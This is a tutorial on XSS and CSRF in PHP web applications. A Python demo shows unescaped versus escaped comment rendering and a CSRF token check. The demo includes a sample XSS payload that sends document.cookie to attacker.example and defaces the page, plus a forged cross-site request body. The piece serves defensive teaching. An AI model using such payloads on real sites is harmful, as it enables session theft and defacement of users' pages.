This article finally pushed me to write the missing doc and publish the xmlwash extension
Of all the vulnerabilities affecting web applications, and PHP applications in particular, Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) are among the most common. Developers frequently downplay their severity and leave them unaddressed.
In this article I show how CSRF and XSS work and how to defend against them. The two are closely related: XSS gets attacker-controlled markup or script executed in the victim's browser within the site's own origin, while CSRF gets the victim's browser to send a request the site trusts only because the browser attaches the session cookie automatically. To dispel the myth that these attacks are harmless, I take the attacker's role and show how injecting a few bytes of HTML into a page can do far more than pop up an alert box: it can steal the user's session, and with it their identity, or rewrite the site's content so transparently that the victim notices nothing.
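The following is an added example, not code from the original article, and it is written in Python rather than PHP so it runs stand-alone. It models the two points made above: a comment echoed into a page unescaped (the PHP `echo "<p>$comment</p>"` pattern) lets a tiny injected `<script>` exfiltrate `document.cookie` and rewrite the page body, whereas `html.escape` (the equivalent of `htmlspecialchars($comment, ENT_QUOTES)`) neutralises it; and a profile form protected by a per-session CSRF token rejects a cross-site POST because the forging page cannot read the token, even though the browser attaches the session cookie. The attack comment, the session store and the request bodies are all constructed for the demo.

```python
import html
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed sample: a guestbook comment an attacker submits. The injected
# "tiny bit of HTML" (1) sends the session cookie to an attacker-controlled
# host, i.e. steals the identity, and (2) rewrites the visible page.
ATTACK_COMMENT = (
    '<script>'
    'new Image().src="http://attacker.example/c?"+document.cookie;'
    'document.body.innerHTML="<h1>Site defaced</h1>";'
    '</script>'
)


def render_comment_vulnerable(comment: str) -> str:
    """Models PHP `echo "<p>$comment</p>"`: the comment lands in the page unchanged."""
    return f"<p>{comment}</p>"


def render_comment_safe(comment: str) -> str:
    """Models `echo '<p>' . htmlspecialchars($comment, ENT_QUOTES) . '</p>'`."""
    return f"<p>{html.escape(comment, quote=True)}</p>"


def contains_active_markup(rendered: str) -> bool:
    """Demo check: did a <script> tag survive into the output?"""
    return "<script" in rendered.lower()


# --- CSRF ---

def new_session() -> dict:
    """Server-side session, constructed for the demo (PHP: $_SESSION).
    The token is random per session and never leaves the origin except
    inside pages the site itself renders."""
    return {"user": "alice", "csrf_token": secrets.token_hex(32)}


def profile_form(session: dict) -> str:
    """The legitimate form carries the session token in a hidden field."""
    return (
        '<form method="post" action="/profile">'
        f'<input type="hidden" name="csrf_token" value="{session["csrf_token"]}">'
        '<input name="email">'
        '</form>'
    )


def handle_profile_post(session: dict, body: str) -> tuple:
    """Accept the POST only if the submitted token equals the session token.
    hmac.compare_digest avoids leaking the token through timing differences."""
    fields = parse_qs(body)
    submitted = fields.get("csrf_token", [""])[0]
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return 403, "CSRF token missing or invalid"
    return 200, f"email updated to {fields.get('email', [''])[0]}"


def forged_request_body() -> str:
    """What a cross-site page can make the victim's browser POST: the browser
    adds the session cookie by itself, but the attacker cannot read the token."""
    return "email=attacker%40evil.example"


def legitimate_request_body(session: dict) -> str:
    """What the site's own form sends: the token from the hidden field."""
    return f"csrf_token={session['csrf_token']}&email=alice%40example.com"


if __name__ == "__main__":
    print(render_comment_vulnerable(ATTACK_COMMENT))
    print(render_comment_safe(ATTACK_COMMENT))
    s = new_session()
    print(handle_profile_post(s, forged_request_body()))
    print(handle_profile_post(s, legitimate_request_body(s)))
```

The token check is the whole CSRF defence: the forged request is indistinguishable from a real one at the cookie level, so the server must demand a value that only a page from its own origin could have obtained. The escaping call is the whole reflected/stored XSS defence for HTML body context; attribute, URL and JavaScript contexts need their own encoders.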